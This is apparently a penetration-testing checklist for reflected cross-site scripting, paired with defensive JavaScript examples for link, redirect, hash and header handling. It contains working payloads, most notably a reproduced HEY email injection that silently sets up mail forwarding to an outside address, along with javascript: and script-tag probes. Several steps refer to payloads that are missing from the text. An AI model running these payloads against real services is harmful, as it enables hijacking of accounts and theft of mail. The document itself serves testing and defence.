Reflected Cross Site Scripting

Check List

Methodology

Black Box

Markdown Link Target

1. Log in to any platform that allows creating or editing text-based pages (such as a wiki or documentation system)
2. Create a new page
3. In the field for the page identifier or slug, enter javascript:
4. Configure the page as follows:
   Title: javascript:
   Format: Markdown
   Content: [XSS](.alert(1);)
5. Save or publish the page
6. After the page is created, click the link labeled “XSS” in the page content
7. If the system is vulnerable, the JavaScript code will execute (e.g., an alert(1) will appear)
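The defensive counterpart to the check above is to allowlist the effective scheme of every link target a user supplies in Markdown before it is emitted as an href. The following is an added example, not code from the page or from any wiki product: relative targets are resolved against the page's own URL so that a target which only becomes javascript: after resolution is caught too, and a second function scans a Markdown body and reports every link the policy rejects. PAGE_URL and SAMPLE_MARKDOWN are constructed values.

```javascript
// Added example (not from the page): allowlist the effective scheme of every link target a
// user supplies in Markdown before it is emitted as an <a href>. Relative targets are resolved
// against the page's own URL, so a target that only becomes "javascript:" after resolution is
// caught as well. PAGE_URL and SAMPLE_MARKDOWN are constructed for this example.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Return the resolved, normalised href when its scheme is allowed, otherwise null.
// The caller still attribute-encodes the returned value when it writes the anchor.
function safeHref(target, pageUrl) {
  let url;
  try {
    // The WHATWG parser trims surrounding whitespace, strips embedded tab/newline and
    // lowercases the scheme, so "  JaVa\nScRiPt:alert(1)" still resolves to "javascript:".
    url = new URL(target, pageUrl);
  } catch {
    return null; // unparseable target: drop the link rather than guess
  }
  return SAFE_SCHEMES.has(url.protocol) ? url.href : null;
}

// Scan Markdown-style links [text](target) and report every target the policy rejects.
// One level of balanced parentheses is allowed inside the target (e.g. "alert(1)").
function auditMarkdownLinks(markdown, pageUrl) {
  const linkRe = /\[([^\]]*)\]\(((?:[^()\s]|\([^()\s]*\))*)\)/g;
  const rejected = [];
  let m;
  while ((m = linkRe.exec(markdown)) !== null) {
    if (safeHref(m[2], pageUrl) === null) rejected.push({ text: m[1], target: m[2] });
  }
  return rejected;
}

// Constructed values: a wiki page whose slug is "javascript:", as in step 3 above, and a body
// that mixes ordinary links with one that must be rejected.
const PAGE_URL = 'https://wiki.example/pages/javascript:';
const SAMPLE_MARKDOWN =
  'See [Docs](/docs/intro), [Mail](mailto:team@wiki.example) and [XSS](javascript:alert(1)).';

console.log(auditMarkdownLinks(SAMPLE_MARKDOWN, PAGE_URL));
```

Because the check runs on the parsed URL rather than on the raw string, case changes, leading whitespace and embedded newlines in the scheme do not bypass it; a relative target such as `.alert(1);` resolves to an https path on the wiki and is allowed, which is the correct outcome once the slug can no longer be used as a scheme.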


HTML Email (HEY)

1. Create a new text file (e.g. email.txt)
2. Put the following exact contents into the file (including the headers and Content-type: text/html):

From: jouko@klikki.fi
To: jouko@hey.com
Subject: HackerOne test
MIME-Version: 1.0
Content-type: text/html

<style>
url(cid://\00003c\000027message-content\00003e\00003ctemplate\00003e\00003cstyle\00003exxx);
url(cid://\00003c/style\00003e\00003c/template\00003e\00003c/message-content\00003e\00003cform\000020action=/my/accounts/266986/forwardings/outbounds\000020data-controller=beacon\00003e\00003cinput\000020type=text\000020name=contact_outbound_forwarding[to_email_address]\000020value=joukop@gmail.com\00003e\00003c/form\00003exxx);
</style>

3. Send the email, for example with sendmail on Linux:

/usr/sbin/sendmail -t < email.txt

(or use any other tool capable of sending raw MIME/HTML emails)

4. Open the recipient’s HEY account and load the sent email (refresh the inbox/viewer if needed)
5. Inspect the rendered HTML for injected tags or form elements (e.g. an injected <form ...> or <iframe ...>)
6. Observe any automatic behavior triggered by the injected HTML (such as POST requests that create a forwarding rule, or a full-window iframe)
7. Repeat with the alternative payload examples from the report (the iframe-based spoof, or <script src=...> plus the hcaptcha payload) to verify the other exploitation vectors
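The payload above works because CSS escapes such as \00003c decode to markup characters after the mail client's HTML filter has already run. A mail pipeline can detect this shape before rendering: decode CSS escapes in every url() value inside a <style> block and flag any value whose scheme is not plain http(s) or which decodes to markup. The following is an added detection example, not code from the page or from HEY; SAMPLE_EMAIL_HTML is a constructed email body modelled on the cid:// shape above, with a shorter form target.

```javascript
// Added example (not from the page): audit the <style> blocks of an HTML email for url()
// values that decode to markup or to a scheme a mail client should never fetch.
// The sample email body below is constructed, modelled on the cid:// payload shape above.

// Decode CSS escapes: "\00003c" (1-6 hex digits plus one optional whitespace) -> "<",
// and "\<" (a non-hex escape) -> "<".
function cssUnescape(s) {
  return s
    .replace(/\\([0-9a-fA-F]{1,6})[ \t\n\f\r]?/g, (_, hex) => String.fromCodePoint(parseInt(hex, 16)))
    .replace(/\\(.)/gs, '$1');
}

const ALLOWED_URL_SCHEMES = new Set(['http:', 'https:']);

// Return one finding per url() whose decoded value is not a plain http(s) fetch.
function auditCss(css) {
  const findings = [];
  const urlRe = /url\(\s*(['"]?)([^)]*?)\1\s*\)/gi;
  let m;
  while ((m = urlRe.exec(css)) !== null) {
    const decoded = cssUnescape(m[2]).trim();
    const schemeMatch = /^([a-zA-Z][a-zA-Z0-9+.-]*:)/.exec(decoded);
    const scheme = schemeMatch ? schemeMatch[1].toLowerCase() : 'relative';
    const reasons = [];
    if (!ALLOWED_URL_SCHEMES.has(scheme)) reasons.push(`scheme ${scheme} not allowed`);
    if (/[<>'"]/.test(decoded)) reasons.push('decodes to markup characters');
    if (reasons.length) findings.push({ url: decoded, reasons });
  }
  return findings;
}

// Pull each <style> block out of an HTML email body and audit it.
function auditEmailHtml(html) {
  const styleRe = /<style\b[^>]*>([\s\S]*?)<\/style>/gi;
  const findings = [];
  let m;
  while ((m = styleRe.exec(html)) !== null) findings.push(...auditCss(m[1]));
  return findings;
}

// Constructed sample: one benign image rule, then a rule shaped like the cid:// injection above
// (the form target is a placeholder path, not the one from the report).
const SAMPLE_EMAIL_HTML = `
<style>
body { background: url(https://cdn.example/bg.png); }
url(cid://\\00003c\\000027message-content\\00003e\\00003cform\\000020action=/settings\\00003e);
</style>
<p>hello</p>`;

console.log(auditEmailHtml(SAMPLE_EMAIL_HTML));
```

Decoding before matching is the whole point: a filter that looks for a literal `<` in the style sheet never sees one, while the mail client's CSS parser does. Rejecting any non-http(s) scheme in url() also removes the cid:// vector on its own, independent of the escape trick.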


return_page_pathname Parameter

1. Log in to the store's website and complete the authentication process
2. Then go to the report section in your profile
3. When you enter the page, check the URL for parameters like return_page_pathname= (the name may differ from site to site)
4. Inject the following payload into the parameter and check whether the code is executed:

javascript:alert('XSS')

5. If it executes, the parameter is vulnerable


errmsg Parameter

1. Enter a site and complete the authentication process
2. During authentication, submit an invalid value for one of the parameters so that the authentication fails
3. If you encounter errmsg parameters in subsequent requests, inject XSS payloads into them
4. For example, a request like the one below:

errmsg = [https://102.176.160.119:10443/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E]

window.location.hash

1. Open Burp and make a request to the main page of the site
2. In the Response panel, use the search box to look for the string window.location.hash and check whether it is present
3. If it is, inject the payload as shown below and check whether it is reflected
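Finding window.location.hash in a response is only a lead; the bug exists when the fragment reaches an HTML sink such as innerHTML or document.write. The added example below (not code from the page or from any site) shows the pattern that keeps such a page safe: the fragment is decoded defensively, matched against an allowlist of section names, and only ever used with getElementById and textContent. The section names and element ids are constructed; the pure functions run anywhere, and the DOM wiring only runs where a document exists.

```javascript
// Added example (not from the page): treat window.location.hash as untrusted data.
// It is decoded defensively, matched against an allowlist of section names, and only
// ever written with textContent / getElementById, never innerHTML or document.write.
// SECTIONS and the element ids are constructed for this example.
const SECTIONS = ['overview', 'install', 'faq'];
const DEFAULT_SECTION = 'overview';

// "#install" -> "install"; "#%3Cb%3Ex" -> "<b>x"; a malformed "%" sequence -> "".
function hashValue(hash) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  try {
    return decodeURIComponent(raw);
  } catch {
    return ''; // URIError on malformed percent-encoding: treat as empty, not as a crash
  }
}

// Allowlist lookup: anything that is not a known section falls back to the default.
function pickSection(hash, sections = SECTIONS) {
  const value = hashValue(hash);
  return sections.includes(value) ? value : DEFAULT_SECTION;
}

// Show one section and label it. The fragment never reaches an HTML sink: ids come from the
// allowlist, and the label is written as a text node, so "<b>x" would render literally.
function showSectionFromHash(doc, hash) {
  const name = pickSection(hash);
  for (const id of SECTIONS) {
    const el = doc.getElementById(id);
    if (el) el.hidden = id !== name;
  }
  const label = doc.getElementById('current-section');
  if (label) label.textContent = name;
  return name;
}

// Browser-side wiring; skipped under Node so the functions above can be exercised stand-alone.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  showSectionFromHash(document, window.location.hash);
  window.addEventListener('hashchange', () => showSectionFromHash(document, window.location.hash));
}
```

When reviewing a page that reads the hash, the question to ask is which sink the value flows into; an allowlist plus textContent removes the sink entirely, which is more robust than trying to encode the fragment for whichever context the original code happened to use.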


Logout Request

1. Log out of the website
2. Capture the request with Burp and review it
3. While reviewing the requests, if you find a request like the one below, inject the payload
4. Log in through email


redirect_url Parameter

1. Log in to the site and complete the registration process
2. Trace the registration process with Burp and inspect the parameters
3. If you see a parameter called redirect_url, inject the following payload as shown below:
4. If the code is reflected, the vulnerability is present
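A redirect_url or return_page_pathname value that is reflected into a Location header or an href needs a stricter rule than a scheme allowlist: it should only ever name a path on the site itself. The added example below (not code from the page or from any site) accepts a single-slash relative path, resolves it against the site origin, and rejects anything that carries a scheme, a protocol-relative host, a backslash trick, or a foreign origin; SITE_ORIGIN is a constructed value.

```javascript
// Added example (not from the page): validate a redirect_url / return_page_pathname value so it
// can only name a path on this site. Values that carry a scheme, an authority, or a backslash
// are rejected, which also removes the javascript: reflection the step above tests for.
// SITE_ORIGIN is a constructed value.
const SITE_ORIGIN = 'https://shop.example';

// Return "path?query" for an acceptable value, otherwise null.
function safeRedirectPath(value) {
  if (typeof value !== 'string' || value === '') return null;
  // Exactly one leading slash, not followed by "/" or "\": rejects "//evil", "/\evil",
  // "javascript:..." and absolute URLs alike.
  if (!/^\/(?![\/\\])/.test(value)) return null;
  let url;
  try {
    url = new URL(value, SITE_ORIGIN);
  } catch {
    return null;
  }
  // Resolution must land on our origin; anything that smuggled in a host or credentials fails here.
  if (url.origin !== SITE_ORIGIN) return null;
  // Hand back the normalised path and query only (dot segments collapsed, fragment dropped).
  return url.pathname + url.search;
}

// Compose the Location value; fall back to the home page when validation fails.
function redirectTarget(value) {
  const path = safeRedirectPath(value);
  return SITE_ORIGIN + (path ?? '/');
}

console.log(redirectTarget("javascript:alert('XSS')"), redirectTarget('/account/orders?page=2'));
```

Falling back to the home page instead of erroring keeps the login flow working for users while giving an attacker-controlled value nowhere to go; logging the rejected value is a useful detection signal for the return_page_pathname and redirect_url probes described in this checklist.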



Address Fields

1. Log in to your account and open your profile on the target site
2. Go to the general section of your account and enter the street address, the city, and the following payload
3. After injection, save, then open the page that shows your location information and the live view
4. For example, a path like the one below (keep in mind that this path can differ from site to site)


Reflected In ContactForm

1. Log in to the target site and find the contact support feature
2. Then, using Burp Suite, make a request to this page and use the GAP extension to identify all of the page's parameters
3. You can also identify the parameters of the support contact page with the x8 tool and the following command
4. If a reflected parameter is found, run the XSS tests. If the payload executes, the vulnerability is confirmed


User-Agent Header

1. Log in to the target site and record the requests using Burp Suite
2. Then send a request to Repeater
3. Replace the User-Agent header value with the following payload and submit the request
4. Refresh the page where the User-Agent is displayed
5. If the alert pops, XSS is confirmed


Language Parameter

1. Log in to the target site and record the requests using Burp Suite
2. Check the requests for a parameter called lang or language, like the one below
3. Then inject an XSS payload in front of the value of this parameter
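The errmsg, User-Agent and lang checks in this list all come down to the same server-side defect: a request-controlled value written into HTML without encoding for the context it lands in. The added example below (not code from the page or from any site) shows the fix for all three at once. Free-text values such as errmsg and the User-Agent are entity-encoded for body text, and lang is allowlisted rather than encoded, because it ends up inside an attribute and is only ever a language tag. The template, the supported languages and SAMPLE_REQUEST are constructed; the request mirrors the errmsg shape in the example URL earlier on this page.

```javascript
// Added example (not from the page): how a server should reflect errmsg, the User-Agent header
// and a lang parameter into HTML. Free-text values are entity-encoded for the HTML body, and
// lang is allowlisted because it is placed in an attribute and is only ever a language tag.
// The template, the supported languages and SAMPLE_REQUEST are constructed.

// Entity-encode the five characters that matter in HTML text and quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

const SUPPORTED_LANGS = new Set(['en', 'fa', 'de']);

// Attribute context plus allowlist: a value that is not a known language tag never reaches the page.
function normaliseLang(value) {
  const v = String(value ?? '').trim().toLowerCase();
  return SUPPORTED_LANGS.has(v) ? v : 'en';
}

// Render the error page. errmsg and userAgent land in text content, so a reflected
// "--><script>" can no longer open a tag; lang lands in an attribute after allowlisting.
function renderErrorPage({ errmsg, userAgent, lang }) {
  return [
    '<!doctype html>',
    `<html lang="${normaliseLang(lang)}">`,
    '<body>',
    `<p class="error">${escapeHtml(errmsg)}</p>`,
    `<p>Your browser: <code>${escapeHtml(userAgent)}</code></p>`,
    '</body></html>',
  ].join('\n');
}

// Check a rendered page the way a regression test would: the raw marker must not survive.
function reflectsUnescaped(html, marker) {
  return html.includes(marker);
}

// Constructed request mirroring the checklist: errmsg from the query string (the same shape as the
// example URL earlier on this page), a hostile User-Agent, and a lang value that tries to break
// out of the attribute.
const SAMPLE_REQUEST = {
  errmsg: 'ABABAB--><script>alert(1337)</script>',
  userAgent: 'Mozilla/5.0 "><svg onload=alert(1)>',
  lang: 'en"><script>alert(1)</script>',
};

console.log(renderErrorPage(SAMPLE_REQUEST));
```

The choice between encoding and allowlisting follows from what the value is for: an error message or a browser string is genuinely free text, so it is encoded and displayed as-is, whereas a language code has a tiny legitimate value space, so anything outside it is simply replaced. Template engines that auto-escape give the first half for free; the second half still has to be written by hand.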


White Box

Cheat Sheet
